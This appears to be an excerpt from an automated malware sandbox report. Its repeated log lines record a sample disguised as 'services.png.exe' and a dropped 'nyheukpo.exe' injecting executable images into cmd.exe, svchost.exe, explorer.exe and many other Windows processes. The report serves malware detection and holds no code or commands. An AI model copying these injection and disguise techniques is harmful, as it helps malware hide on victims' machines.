                        Source: C:\Users\user\AppData\Roaming\Azockavulie\nyheukpo.exeMemory written: C:\Windows\System32\sihost.exe base: AC0000 value starts with: 4D5AJump to behavior
                        Source: C:\Users\user\AppData\Roaming\Azockavulie\nyheukpo.exeMemory written: C:\Windows\System32\svchost.exe base: 910000 value starts with: 4D5AJump to behavior
                        Source: C:\Users\user\AppData\Roaming\Azockavulie\nyheukpo.exeMemory written: C:\Windows\System32\svchost.exe base: 9A0000 value starts with: 4D5AJump to behavior
                        Source: C:\Users\user\AppData\Roaming\Azockavulie\nyheukpo.exeMemory written: C:\Windows\System32\ctfmon.exe base: A50000 value starts with: 4D5AJump to behavior
                        Source: C:\Users\user\AppData\Roaming\Azockavulie\nyheukpo.exeMemory written: C:\Windows\explorer.exe base: C350000 value starts with: 4D5AJump to behavior
                        Source: C:\Users\user\AppData\Roaming\Azockavulie\nyheukpo.exeMemory written: C:\Windows\System32\svchost.exe base: D40000 value starts with: 4D5AJump to behavior
                        Source: C:\Users\user\AppData\Roaming\Azockavulie\nyheukpo.exeMemory written: C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe base: B50000 value starts with: 4D5AJump to behavior
                        Source: C:\Users\user\AppData\Roaming\Azockavulie\nyheukpo.exeMemory written: C:\Windows\System32\RuntimeBroker.exe base: 110000 value starts with: 4D5AJump to behavior
                        Source: C:\Users\user\AppData\Roaming\Azockavulie\nyheukpo.exeMemory written: C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe base: A90000 value starts with: 4D5AJump to behavior
                        Source: C:\Users\user\AppData\Roaming\Azockavulie\nyheukpo.exeMemory written: C:\Windows\System32\RuntimeBroker.exe base: AB0000 value starts with: 4D5AJump to behavior
                        Source: C:\Users\user\AppData\Roaming\Azockavulie\nyheukpo.exeMemory written: C:\Windows\System32\smartscreen.exe base: 290000 value starts with: 4D5AJump to behavior
                        Source: C:\Users\user\AppData\Roaming\Azockavulie\nyheukpo.exeMemory written: C:\Windows\SystemApps\MicrosoftWindows.Client.CBS_cw5n1h2txyewy\TextInputHost.exe base: 580000 value starts with: 4D5AJump to behavior
                        Source: C:\Users\user\AppData\Roaming\Azockavulie\nyheukpo.exeMemory written: C:\Windows\System32\RuntimeBroker.exe base: 3D0000 value starts with: 4D5AJump to behavior
                        Source: C:\Users\user\AppData\Roaming\Azockavulie\nyheukpo.exeMemory written: C:\Windows\System32\RuntimeBroker.exe base: 900000 value starts with: 4D5AJump to behavior
                        Source: C:\Users\user\AppData\Roaming\Azockavulie\nyheukpo.exeMemory written: C:\Windows\System32\ApplicationFrameHost.exe base: 180000 value starts with: 4D5AJump to behavior
                        Source: C:\Users\user\AppData\Roaming\Azockavulie\nyheukpo.exeMemory written: C:\Program Files\WindowsApps\Microsoft.WindowsStore_11910.1002.5.0_x64__8wekyb3d8bbwe\WinStore.App.exe base: A10000 value starts with: 4D5AJump to behavior
                        Source: C:\Users\user\AppData\Roaming\Azockavulie\nyheukpo.exeMemory written: C:\Windows\System32\RuntimeBroker.exe base: 190000 value starts with: 4D5AJump to behavior
                        Source: C:\Users\user\AppData\Roaming\Azockavulie\nyheukpo.exeMemory written: C:\Windows\ImmersiveControlPanel\SystemSettings.exe base: F10000 value starts with: 4D5AJump to behavior
                        Source: C:\Users\user\AppData\Roaming\Azockavulie\nyheukpo.exeMemory written: C:\Windows\System32\oobe\UserOOBEBroker.exe base: 10000 value starts with: 4D5AJump to behavior
                        Source: C:\Users\user\AppData\Roaming\Azockavulie\nyheukpo.exeMemory written: C:\Windows\System32\svchost.exe base: FB0000 value starts with: 4D5AJump to behavior
                        Source: C:\Users\user\AppData\Roaming\Azockavulie\nyheukpo.exeMemory written: C:\Windows\System32\dllhost.exe base: AC0000 value starts with: 4D5AJump to behavior
                        Source: C:\Users\user\AppData\Roaming\Azockavulie\nyheukpo.exeMemory written: C:\Windows\System32\conhost.exe base: 30000 value starts with: 4D5AJump to behavior
                        Source: C:\Users\user\AppData\Roaming\Azockavulie\nyheukpo.exeMemory written: C:\Windows\System32\backgroundTaskHost.exe base: E20000 value starts with: 4D5AJump to behavior
                        Source: C:\Users\user\AppData\Roaming\Azockavulie\nyheukpo.exeMemory written: C:\Windows\System32\RuntimeBroker.exe base: 810000 value starts with: 4D5AJump to behavior
                        Source: C:\Users\user\AppData\Roaming\Azockavulie\nyheukpo.exeMemory written: C:\Windows\System32\RuntimeBroker.exe base: EE0000 value starts with: 4D5AJump to behavior
                        Source: C:\Users\user\AppData\Roaming\Azockavulie\nyheukpo.exeMemory written: C:\Program Files (x86)\LdeWKZazZKfvzrGtjGuLEmITNknRAgVxStdwTQWzMvzouYILHHdXru\XRdxSzSUL8yOL.exe base: 2990000 value starts with: 4D5AJump to behavior
                        Source: C:\Users\user\AppData\Roaming\Azockavulie\nyheukpo.exeMemory written: C:\Program Files (x86)\LdeWKZazZKfvzrGtjGuLEmITNknRAgVxStdwTQWzMvzouYILHHdXru\XRdxSzSUL8yOL.exe base: 2E30000 value starts with: 4D5AJump to behavior
                        Source: C:\Users\user\AppData\Roaming\Azockavulie\nyheukpo.exeMemory written: C:\Program Files (x86)\LdeWKZazZKfvzrGtjGuLEmITNknRAgVxStdwTQWzMvzouYILHHdXru\XRdxSzSUL8yOL.exe base: 2530000 value starts with: 4D5AJump to behavior
                        Source: C:\Users\user\AppData\Roaming\Azockavulie\nyheukpo.exeMemory written: C:\Program Files (x86)\LdeWKZazZKfvzrGtjGuLEmITNknRAgVxStdwTQWzMvzouYILHHdXru\XRdxSzSUL8yOL.exe base: 2E50000 value starts with: 4D5AJump to behavior
                        Source: C:\Users\user\AppData\Roaming\Azockavulie\nyheukpo.exeMemory written: C:\Program Files (x86)\LdeWKZazZKfvzrGtjGuLEmITNknRAgVxStdwTQWzMvzouYILHHdXru\XRdxSzSUL8yOL.exe base: 2400000 value starts with: 4D5AJump to behavior
                        Source: C:\Users\user\AppData\Roaming\Azockavulie\nyheukpo.exeMemory written: C:\Program Files (x86)\LdeWKZazZKfvzrGtjGuLEmITNknRAgVxStdwTQWzMvzouYILHHdXru\XRdxSzSUL8yOL.exe base: 25D0000 value starts with: 4D5AJump to behavior
                        Source: C:\Users\user\AppData\Roaming\Azockavulie\nyheukpo.exeMemory written: C:\Program Files (x86)\LdeWKZazZKfvzrGtjGuLEmITNknRAgVxStdwTQWzMvzouYILHHdXru\XRdxSzSUL8yOL.exe base: 2CA0000 value starts with: 4D5AJump to behavior
                        Source: C:\Users\user\AppData\Roaming\Azockavulie\nyheukpo.exeMemory written: C:\Program Files (x86)\LdeWKZazZKfvzrGtjGuLEmITNknRAgVxStdwTQWzMvzouYILHHdXru\XRdxSzSUL8yOL.exe base: C90000 value starts with: 4D5AJump to behavior
                        Source: C:\Users\user\AppData\Roaming\Azockavulie\nyheukpo.exeMemory written: C:\Program Files (x86)\LdeWKZazZKfvzrGtjGuLEmITNknRAgVxStdwTQWzMvzouYILHHdXru\XRdxSzSUL8yOL.exe base: 2F50000 value starts with: 4D5AJump to behavior
                        Source: C:\Users\user\AppData\Roaming\Azockavulie\nyheukpo.exeMemory written: C:\Program Files (x86)\LdeWKZazZKfvzrGtjGuLEmITNknRAgVxStdwTQWzMvzouYILHHdXru\XRdxSzSUL8yOL.exe base: 2B30000 value starts with: 4D5AJump to behavior
                        Source: C:\Users\user\AppData\Roaming\Azockavulie\nyheukpo.exeMemory written: C:\Program Files (x86)\LdeWKZazZKfvzrGtjGuLEmITNknRAgVxStdwTQWzMvzouYILHHdXru\XRdxSzSUL8yOL.exe base: 2390000 value starts with: 4D5AJump to behavior
                        Source: C:\Users\user\AppData\Roaming\Azockavulie\nyheukpo.exeMemory written: C:\Program Files (x86)\LdeWKZazZKfvzrGtjGuLEmITNknRAgVxStdwTQWzMvzouYILHHdXru\XRdxSzSUL8yOL.exe base: 2C90000 value starts with: 4D5AJump to behavior
                        Source: C:\Users\user\AppData\Roaming\Azockavulie\nyheukpo.exeMemory written: C:\Program Files (x86)\LdeWKZazZKfvzrGtjGuLEmITNknRAgVxStdwTQWzMvzouYILHHdXru\XRdxSzSUL8yOL.exe base: 29E0000 value starts with: 4D5AJump to behavior
                        Source: C:\Users\user\AppData\Roaming\Azockavulie\nyheukpo.exeMemory written: C:\Program Files (x86)\LdeWKZazZKfvzrGtjGuLEmITNknRAgVxStdwTQWzMvzouYILHHdXru\XRdxSzSUL8yOL.exe base: 24E0000 value starts with: 4D5AJump to behavior
                        Source: C:\Users\user\AppData\Roaming\Azockavulie\nyheukpo.exeMemory written: C:\Program Files (x86)\LdeWKZazZKfvzrGtjGuLEmITNknRAgVxStdwTQWzMvzouYILHHdXru\XRdxSzSUL8yOL.exe base: 1640000 value starts with: 4D5AJump to behavior
                        Source: C:\Users\user\AppData\Roaming\Azockavulie\nyheukpo.exeMemory written: C:\Program Files (x86)\LdeWKZazZKfvzrGtjGuLEmITNknRAgVxStdwTQWzMvzouYILHHdXru\XRdxSzSUL8yOL.exe base: 2CC0000 value starts with: 4D5AJump to behavior
                        Source: C:\Users\user\AppData\Roaming\Azockavulie\nyheukpo.exeMemory written: C:\Program Files (x86)\LdeWKZazZKfvzrGtjGuLEmITNknRAgVxStdwTQWzMvzouYILHHdXru\XRdxSzSUL8yOL.exe base: 2310000 value starts with: 4D5AJump to behavior
                        Source: C:\Users\user\AppData\Roaming\Azockavulie\nyheukpo.exeMemory written: C:\Program Files (x86)\LdeWKZazZKfvzrGtjGuLEmITNknRAgVxStdwTQWzMvzouYILHHdXru\XRdxSzSUL8yOL.exe base: 2A50000 value starts with: 4D5AJump to behavior
                        Source: C:\Users\user\AppData\Roaming\Azockavulie\nyheukpo.exeMemory written: C:\Program Files (x86)\LdeWKZazZKfvzrGtjGuLEmITNknRAgVxStdwTQWzMvzouYILHHdXru\XRdxSzSUL8yOL.exe base: 2720000 value starts with: 4D5AJump to behavior
                        Source: C:\Users\user\AppData\Roaming\Azockavulie\nyheukpo.exeMemory written: C:\Program Files (x86)\LdeWKZazZKfvzrGtjGuLEmITNknRAgVxStdwTQWzMvzouYILHHdXru\XRdxSzSUL8yOL.exe base: 2460000 value starts with: 4D5AJump to behavior
                        Source: C:\Users\user\AppData\Roaming\Azockavulie\nyheukpo.exeMemory written: C:\Program Files (x86)\LdeWKZazZKfvzrGtjGuLEmITNknRAgVxStdwTQWzMvzouYILHHdXru\XRdxSzSUL8yOL.exe base: 2740000 value starts with: 4D5AJump to behavior
                        Source: C:\Users\user\AppData\Roaming\Azockavulie\nyheukpo.exeMemory written: C:\Program Files (x86)\LdeWKZazZKfvzrGtjGuLEmITNknRAgVxStdwTQWzMvzouYILHHdXru\XRdxSzSUL8yOL.exe base: 11B0000 value starts with: 4D5AJump to behavior
                        Source: C:\Users\user\AppData\Roaming\Azockavulie\nyheukpo.exeMemory written: C:\Program Files (x86)\LdeWKZazZKfvzrGtjGuLEmITNknRAgVxStdwTQWzMvzouYILHHdXru\XRdxSzSUL8yOL.exe base: 2EA0000 value starts with: 4D5AJump to behavior
                        Source: C:\Users\user\AppData\Roaming\Azockavulie\nyheukpo.exeMemory written: C:\Program Files (x86)\LdeWKZazZKfvzrGtjGuLEmITNknRAgVxStdwTQWzMvzouYILHHdXru\XRdxSzSUL8yOL.exe base: 2AC0000 value starts with: 4D5AJump to behavior
                        Source: C:\Users\user\AppData\Roaming\Azockavulie\nyheukpo.exeMemory written: C:\Program Files (x86)\LdeWKZazZKfvzrGtjGuLEmITNknRAgVxStdwTQWzMvzouYILHHdXru\XRdxSzSUL8yOL.exe base: 24C0000 value starts with: 4D5AJump to behavior
                        Source: C:\Users\user\AppData\Roaming\Azockavulie\nyheukpo.exeMemory written: C:\Program Files (x86)\LdeWKZazZKfvzrGtjGuLEmITNknRAgVxStdwTQWzMvzouYILHHdXru\XRdxSzSUL8yOL.exe base: 2D00000 value starts with: 4D5AJump to behavior
                        Source: C:\Users\user\AppData\Roaming\Azockavulie\nyheukpo.exeMemory written: C:\Program Files (x86)\LdeWKZazZKfvzrGtjGuLEmITNknRAgVxStdwTQWzMvzouYILHHdXru\XRdxSzSUL8yOL.exe base: 2AC0000 value starts with: 4D5AJump to behavior
                        Source: C:\Users\user\AppData\Roaming\Azockavulie\nyheukpo.exeMemory written: C:\Program Files (x86)\LdeWKZazZKfvzrGtjGuLEmITNknRAgVxStdwTQWzMvzouYILHHdXru\XRdxSzSUL8yOL.exe base: 3190000 value starts with: 4D5AJump to behavior
                        Source: C:\Users\user\AppData\Roaming\Azockavulie\nyheukpo.exeMemory written: C:\Program Files (x86)\LdeWKZazZKfvzrGtjGuLEmITNknRAgVxStdwTQWzMvzouYILHHdXru\XRdxSzSUL8yOL.exe base: 2A40000 value starts with: 4D5AJump to behavior
                        Source: C:\Users\user\AppData\Roaming\Azockavulie\nyheukpo.exeMemory written: C:\Program Files (x86)\LdeWKZazZKfvzrGtjGuLEmITNknRAgVxStdwTQWzMvzouYILHHdXru\XRdxSzSUL8yOL.exe base: 390000 value starts with: 4D5AJump to behavior
                        Source: C:\Users\user\AppData\Roaming\Azockavulie\nyheukpo.exeMemory written: C:\Program Files (x86)\LdeWKZazZKfvzrGtjGuLEmITNknRAgVxStdwTQWzMvzouYILHHdXru\XRdxSzSUL8yOL.exe base: 2C60000 value starts with: 4D5AJump to behavior
                        Source: C:\Users\user\AppData\Roaming\Azockavulie\nyheukpo.exeMemory written: C:\Program Files (x86)\LdeWKZazZKfvzrGtjGuLEmITNknRAgVxStdwTQWzMvzouYILHHdXru\XRdxSzSUL8yOL.exe base: 2970000 value starts with: 4D5AJump to behavior
                        Source: C:\Users\user\AppData\Roaming\Azockavulie\nyheukpo.exeMemory written: C:\Program Files (x86)\LdeWKZazZKfvzrGtjGuLEmITNknRAgVxStdwTQWzMvzouYILHHdXru\XRdxSzSUL8yOL.exe base: 2B20000 value starts with: 4D5AJump to behavior
                        Source: C:\Users\user\AppData\Roaming\Azockavulie\nyheukpo.exeMemory written: C:\Program Files (x86)\LdeWKZazZKfvzrGtjGuLEmITNknRAgVxStdwTQWzMvzouYILHHdXru\XRdxSzSUL8yOL.exe base: 27E0000 value starts with: 4D5AJump to behavior
                        Source: C:\Users\user\AppData\Roaming\Azockavulie\nyheukpo.exeMemory written: C:\Program Files (x86)\LdeWKZazZKfvzrGtjGuLEmITNknRAgVxStdwTQWzMvzouYILHHdXru\XRdxSzSUL8yOL.exe base: 2210000 value starts with: 4D5AJump to behavior
                        Source: C:\Users\user\AppData\Roaming\Azockavulie\nyheukpo.exeMemory written: C:\Program Files (x86)\LdeWKZazZKfvzrGtjGuLEmITNknRAgVxStdwTQWzMvzouYILHHdXru\XRdxSzSUL8yOL.exe base: 2880000 value starts with: 4D5AJump to behavior
                        Source: C:\Users\user\AppData\Roaming\Azockavulie\nyheukpo.exeMemory written: C:\Program Files (x86)\LdeWKZazZKfvzrGtjGuLEmITNknRAgVxStdwTQWzMvzouYILHHdXru\XRdxSzSUL8yOL.exe base: 11E0000 value starts with: 4D5AJump to behavior
                        Source: C:\Users\user\AppData\Roaming\Azockavulie\nyheukpo.exeMemory written: C:\Program Files (x86)\LdeWKZazZKfvzrGtjGuLEmITNknRAgVxStdwTQWzMvzouYILHHdXru\XRdxSzSUL8yOL.exe base: DA0000 value starts with: 4D5AJump to behavior
                        Source: C:\Users\user\AppData\Roaming\Azockavulie\nyheukpo.exeMemory written: C:\Program Files (x86)\LdeWKZazZKfvzrGtjGuLEmITNknRAgVxStdwTQWzMvzouYILHHdXru\XRdxSzSUL8yOL.exe base: 790000 value starts with: 4D5AJump to behavior
                        Source: C:\Users\user\AppData\Roaming\Azockavulie\nyheukpo.exeMemory written: C:\Program Files (x86)\LdeWKZazZKfvzrGtjGuLEmITNknRAgVxStdwTQWzMvzouYILHHdXru\XRdxSzSUL8yOL.exe base: 26D0000 value starts with: 4D5AJump to behavior
                        Source: C:\Users\user\AppData\Roaming\Azockavulie\nyheukpo.exeMemory written: C:\Program Files (x86)\LdeWKZazZKfvzrGtjGuLEmITNknRAgVxStdwTQWzMvzouYILHHdXru\XRdxSzSUL8yOL.exe base: 2580000 value starts with: 4D5AJump to behavior
                        Source: C:\Users\user\AppData\Roaming\Azockavulie\nyheukpo.exeMemory written: C:\Program Files (x86)\LdeWKZazZKfvzrGtjGuLEmITNknRAgVxStdwTQWzMvzouYILHHdXru\XRdxSzSUL8yOL.exe base: 2C40000 value starts with: 4D5AJump to behavior
                        Source: C:\Users\user\AppData\Roaming\Azockavulie\nyheukpo.exeMemory written: C:\Program Files (x86)\LdeWKZazZKfvzrGtjGuLEmITNknRAgVxStdwTQWzMvzouYILHHdXru\XRdxSzSUL8yOL.exe base: 25B0000 value starts with: 4D5AJump to behavior
                        Source: C:\Users\user\AppData\Roaming\Azockavulie\nyheukpo.exeMemory written: C:\Program Files (x86)\LdeWKZazZKfvzrGtjGuLEmITNknRAgVxStdwTQWzMvzouYILHHdXru\XRdxSzSUL8yOL.exe base: 2F10000 value starts with: 4D5AJump to behavior
                        Source: C:\Users\user\AppData\Roaming\Azockavulie\nyheukpo.exeMemory written: C:\Program Files (x86)\LdeWKZazZKfvzrGtjGuLEmITNknRAgVxStdwTQWzMvzouYILHHdXru\XRdxSzSUL8yOL.exe base: 700000 value starts with: 4D5AJump to behavior
                        Source: C:\Users\user\AppData\Roaming\Azockavulie\nyheukpo.exeMemory written: C:\Program Files (x86)\LdeWKZazZKfvzrGtjGuLEmITNknRAgVxStdwTQWzMvzouYILHHdXru\XRdxSzSUL8yOL.exe base: 2C70000 value starts with: 4D5AJump to behavior
                        Source: C:\Users\user\AppData\Roaming\Azockavulie\nyheukpo.exeMemory written: C:\Program Files (x86)\LdeWKZazZKfvzrGtjGuLEmITNknRAgVxStdwTQWzMvzouYILHHdXru\XRdxSzSUL8yOL.exe base: 2610000 value starts with: 4D5AJump to behavior
                        Source: C:\Users\user\AppData\Roaming\Azockavulie\nyheukpo.exeMemory written: C:\Program Files (x86)\LdeWKZazZKfvzrGtjGuLEmITNknRAgVxStdwTQWzMvzouYILHHdXru\XRdxSzSUL8yOL.exe base: 6D0000 value starts with: 4D5AJump to behavior
                        Source: C:\Users\user\AppData\Roaming\Azockavulie\nyheukpo.exeMemory written: C:\Program Files (x86)\LdeWKZazZKfvzrGtjGuLEmITNknRAgVxStdwTQWzMvzouYILHHdXru\XRdxSzSUL8yOL.exe base: 1130000 value starts with: 4D5AJump to behavior
                        Source: C:\Users\user\AppData\Roaming\Azockavulie\nyheukpo.exeMemory written: C:\Program Files (x86)\LdeWKZazZKfvzrGtjGuLEmITNknRAgVxStdwTQWzMvzouYILHHdXru\XRdxSzSUL8yOL.exe base: 9D0000 value starts with: 4D5AJump to behavior
                        Source: C:\Users\user\AppData\Roaming\Azockavulie\nyheukpo.exeMemory written: C:\Program Files (x86)\LdeWKZazZKfvzrGtjGuLEmITNknRAgVxStdwTQWzMvzouYILHHdXru\XRdxSzSUL8yOL.exe base: B90000 value starts with: 4D5AJump to behavior
                        Source: C:\Users\user\AppData\Roaming\Azockavulie\nyheukpo.exeMemory written: C:\Program Files (x86)\LdeWKZazZKfvzrGtjGuLEmITNknRAgVxStdwTQWzMvzouYILHHdXru\XRdxSzSUL8yOL.exe base: 25E0000 value starts with: 4D5AJump to behavior
                        Source: C:\Users\user\AppData\Roaming\Azockavulie\nyheukpo.exeMemory written: C:\Program Files (x86)\LdeWKZazZKfvzrGtjGuLEmITNknRAgVxStdwTQWzMvzouYILHHdXru\XRdxSzSUL8yOL.exe base: C10000 value starts with: 4D5AJump to behavior
                        Source: C:\Users\user\AppData\Roaming\Azockavulie\nyheukpo.exeMemory written: C:\Program Files (x86)\LdeWKZazZKfvzrGtjGuLEmITNknRAgVxStdwTQWzMvzouYILHHdXru\XRdxSzSUL8yOL.exe base: 790000 value starts with: 4D5AJump to behavior
                        Source: C:\Users\user\AppData\Roaming\Azockavulie\nyheukpo.exeMemory written: C:\Program Files (x86)\LdeWKZazZKfvzrGtjGuLEmITNknRAgVxStdwTQWzMvzouYILHHdXru\XRdxSzSUL8yOL.exe base: 390000 value starts with: 4D5AJump to behavior
                        Source: C:\Users\user\AppData\Roaming\Azockavulie\nyheukpo.exeMemory written: C:\Program Files (x86)\LdeWKZazZKfvzrGtjGuLEmITNknRAgVxStdwTQWzMvzouYILHHdXru\XRdxSzSUL8yOL.exe base: 2D20000 value starts with: 4D5AJump to behavior
                        Source: C:\Users\user\AppData\Roaming\Azockavulie\nyheukpo.exeMemory written: C:\Program Files (x86)\LdeWKZazZKfvzrGtjGuLEmITNknRAgVxStdwTQWzMvzouYILHHdXru\XRdxSzSUL8yOL.exe base: 24E0000 value starts with: 4D5AJump to behavior
                        Source: C:\Users\user\AppData\Roaming\Azockavulie\nyheukpo.exeMemory written: C:\Program Files (x86)\LdeWKZazZKfvzrGtjGuLEmITNknRAgVxStdwTQWzMvzouYILHHdXru\XRdxSzSUL8yOL.exe base: 2510000 value starts with: 4D5AJump to behavior
                        Source: C:\Users\user\AppData\Roaming\Azockavulie\nyheukpo.exeMemory written: C:\Program Files (x86)\LdeWKZazZKfvzrGtjGuLEmITNknRAgVxStdwTQWzMvzouYILHHdXru\XRdxSzSUL8yOL.exe base: 2550000 value starts with: 4D5AJump to behavior
                        Source: C:\Users\user\AppData\Roaming\Azockavulie\nyheukpo.exeMemory written: C:\Program Files (x86)\LdeWKZazZKfvzrGtjGuLEmITNknRAgVxStdwTQWzMvzouYILHHdXru\XRdxSzSUL8yOL.exe base: 2460000 value starts with: 4D5AJump to behavior
                        Source: C:\Users\user\AppData\Roaming\Azockavulie\nyheukpo.exeMemory written: C:\Program Files (x86)\LdeWKZazZKfvzrGtjGuLEmITNknRAgVxStdwTQWzMvzouYILHHdXru\XRdxSzSUL8yOL.exe base: 29F0000 value starts with: 4D5AJump to behavior
                        Source: C:\Users\user\AppData\Roaming\Azockavulie\nyheukpo.exeMemory written: C:\Program Files (x86)\LdeWKZazZKfvzrGtjGuLEmITNknRAgVxStdwTQWzMvzouYILHHdXru\XRdxSzSUL8yOL.exe base: 2090000 value starts with: 4D5AJump to behavior
                        Source: C:\Users\user\AppData\Roaming\Azockavulie\nyheukpo.exeMemory written: C:\Program Files (x86)\LdeWKZazZKfvzrGtjGuLEmITNknRAgVxStdwTQWzMvzouYILHHdXru\XRdxSzSUL8yOL.exe base: 20A0000 value starts with: 4D5AJump to behavior
                        Source: C:\Users\user\AppData\Roaming\Azockavulie\nyheukpo.exeMemory written: C:\Program Files (x86)\LdeWKZazZKfvzrGtjGuLEmITNknRAgVxStdwTQWzMvzouYILHHdXru\XRdxSzSUL8yOL.exe base: 2C90000 value starts with: 4D5AJump to behavior
                        Source: C:\Users\user\AppData\Roaming\Azockavulie\nyheukpo.exeMemory written: C:\Program Files (x86)\LdeWKZazZKfvzrGtjGuLEmITNknRAgVxStdwTQWzMvzouYILHHdXru\XRdxSzSUL8yOL.exe base: 26A0000 value starts with: 4D5AJump to behavior
                        Source: C:\Users\user\AppData\Roaming\Azockavulie\nyheukpo.exeMemory written: C:\Program Files (x86)\LdeWKZazZKfvzrGtjGuLEmITNknRAgVxStdwTQWzMvzouYILHHdXru\XRdxSzSUL8yOL.exe base: 2E00000 value starts with: 4D5AJump to behavior
                        Source: C:\Users\user\AppData\Roaming\Azockavulie\nyheukpo.exeMemory written: C:\Program Files (x86)\LdeWKZazZKfvzrGtjGuLEmITNknRAgVxStdwTQWzMvzouYILHHdXru\XRdxSzSUL8yOL.exe base: 2280000 value starts with: 4D5AJump to behavior
                        Source: C:\Users\user\AppData\Roaming\Azockavulie\nyheukpo.exeMemory written: C:\Program Files (x86)\LdeWKZazZKfvzrGtjGuLEmITNknRAgVxStdwTQWzMvzouYILHHdXru\XRdxSzSUL8yOL.exe base: 26B0000 value starts with: 4D5AJump to behavior
                        Source: C:\Users\user\AppData\Roaming\Azockavulie\nyheukpo.exeMemory written: C:\Program Files (x86)\LdeWKZazZKfvzrGtjGuLEmITNknRAgVxStdwTQWzMvzouYILHHdXru\XRdxSzSUL8yOL.exe base: 2CC0000 value starts with: 4D5AJump to behavior
                        Source: C:\Users\user\AppData\Roaming\Azockavulie\nyheukpo.exeMemory written: C:\Program Files (x86)\LdeWKZazZKfvzrGtjGuLEmITNknRAgVxStdwTQWzMvzouYILHHdXru\XRdxSzSUL8yOL.exe base: 3090000 value starts with: 4D5AJump to behavior
                        Source: C:\Users\user\AppData\Roaming\Azockavulie\nyheukpo.exeMemory written: C:\Program Files (x86)\LdeWKZazZKfvzrGtjGuLEmITNknRAgVxStdwTQWzMvzouYILHHdXru\XRdxSzSUL8yOL.exe base: FE0000 value starts with: 4D5AJump to behavior
                        Source: C:\Users\user\AppData\Roaming\Azockavulie\nyheukpo.exeMemory written: C:\Program Files (x86)\LdeWKZazZKfvzrGtjGuLEmITNknRAgVxStdwTQWzMvzouYILHHdXru\XRdxSzSUL8yOL.exe base: 2980000 value starts with: 4D5AJump to behavior
                        Source: C:\Users\user\AppData\Roaming\Azockavulie\nyheukpo.exeMemory written: C:\Program Files (x86)\LdeWKZazZKfvzrGtjGuLEmITNknRAgVxStdwTQWzMvzouYILHHdXru\XRdxSzSUL8yOL.exe base: 2EC0000 value starts with: 4D5AJump to behavior
                        Source: C:\Users\user\AppData\Roaming\Azockavulie\nyheukpo.exeMemory written: C:\Program Files (x86)\LdeWKZazZKfvzrGtjGuLEmITNknRAgVxStdwTQWzMvzouYILHHdXru\XRdxSzSUL8yOL.exe base: 2DF0000 value starts with: 4D5AJump to behavior
                        Source: C:\Users\user\AppData\Roaming\Azockavulie\nyheukpo.exeMemory written: PID: 2580 base: C350000 value: 4DJump to behavior
                        Source: C:\Users\user\AppData\Roaming\Azockavulie\nyheukpo.exeMemory written: PID: 2580 base: C391778 value: 00Jump to behavior
                        Source: C:\Users\user\AppData\Roaming\Azockavulie\nyheukpo.exeMemory written: PID: 2580 base: C39178C value: 00Jump to behavior
                        Source: C:\Users\user\AppData\Roaming\Azockavulie\nyheukpo.exeMemory written: PID: 2580 base: C391BF0 value: D8Jump to behavior
                        Source: C:\Users\user\AppData\Roaming\Azockavulie\nyheukpo.exeMemory written: PID: 2580 base: C391BF4 value: ACJump to behavior
                        Source: C:\Users\user\Desktop\services.png.exeMemory written: C:\Windows\SysWOW64\cmd.exe base: 2960000Jump to behavior
                        Source: C:\Users\user\Desktop\services.png.exeMemory written: C:\Windows\SysWOW64\cmd.exe base: 29A1778Jump to behavior
                        Source: C:\Users\user\Desktop\services.png.exeMemory written: C:\Windows\SysWOW64\cmd.exe base: 29A178CJump to behavior
                        Source: C:\Users\user\Desktop\services.png.exeMemory written: C:\Windows\SysWOW64\cmd.exe base: 29A1BF0Jump to behavior
                        Source: C:\Users\user\Desktop\services.png.exeMemory written: C:\Windows\SysWOW64\cmd.exe base: 29A1BF4Jump to behavior
                        Source: C:\Users\user\AppData\Roaming\Azockavulie\nyheukpo.exeMemory written: C:\Windows\System32\sihost.exe base: AC0000Jump to behavior
                        Source: C:\Users\user\AppData\Roaming\Azockavulie\nyheukpo.exeMemory written: C:\Windows\System32\sihost.exe base: B01778Jump to behavior
                        Source: C:\Users\user\AppData\Roaming\Azockavulie\nyheukpo.exeMemory written: C:\Windows\System32\sihost.exe base: B0178CJump to behavior
                        Source: C:\Users\user\AppData\Roaming\Azockavulie\nyheukpo.exeMemory written: C:\Windows\System32\sihost.exe base: B01BF0Jump to behavior
                        Source: C:\Users\user\AppData\Roaming\Azockavulie\nyheukpo.exeMemory written: C:\Windows\System32\sihost.exe base: B01BF4Jump to behavior
                        Source: C:\Users\user\AppData\Roaming\Azockavulie\nyheukpo.exeMemory written: C:\Windows\System32\svchost.exe base: 910000Jump to behavior
                        Source: C:\Users\user\AppData\Roaming\Azockavulie\nyheukpo.exeMemory written: C:\Windows\System32\svchost.exe base: 951778Jump to behavior
                        Source: C:\Users\user\AppData\Roaming\Azockavulie\nyheukpo.exeMemory written: C:\Windows\System32\svchost.exe base: 95178CJump to behavior
                        Source: C:\Users\user\AppData\Roaming\Azockavulie\nyheukpo.exeMemory written: C:\Windows\System32\svchost.exe base: 951BF0Jump to behavior
                        Source: C:\Users\user\AppData\Roaming\Azockavulie\nyheukpo.exeMemory written: C:\Windows\System32\svchost.exe base: 951BF4Jump to behavior
                        Source: C:\Users\user\AppData\Roaming\Azockavulie\nyheukpo.exeMemory written: C:\Windows\System32\svchost.exe base: 9A0000Jump to behavior
                        Source: C:\Users\user\AppData\Roaming\Azockavulie\nyheukpo.exeMemory written: C:\Windows\System32\svchost.exe base: 9E1778Jump to behavior
                        Source: C:\Users\user\AppData\Roaming\Azockavulie\nyheukpo.exeMemory written: C:\Windows\System32\svchost.exe base: 9E178CJump to behavior
                        Source: C:\Users\user\AppData\Roaming\Azockavulie\nyheukpo.exeMemory written: C:\Windows\System32\svchost.exe base: 9E1BF0Jump to behavior
                        Source: C:\Users\user\AppData\Roaming\Azockavulie\nyheukpo.exeMemory written: C:\Windows\System32\svchost.exe base: 9E1BF4Jump to behavior
                        Source: C:\Users\user\AppData\Roaming\Azockavulie\nyheukpo.exeMemory written: C:\Windows\System32\ctfmon.exe base: A50000Jump to behavior
                        Source: C:\Users\user\AppData\Roaming\Azockavulie\nyheukpo.exeMemory written: C:\Windows\System32\ctfmon.exe base: A91778Jump to behavior
                        Source: C:\Users\user\AppData\Roaming\Azockavulie\nyheukpo.exeMemory written: C:\Windows\System32\ctfmon.exe base: A9178CJump to behavior
                        Source: C:\Users\user\AppData\Roaming\Azockavulie\nyheukpo.exeMemory written: C:\Windows\System32\ctfmon.exe base: A91BF0Jump to behavior
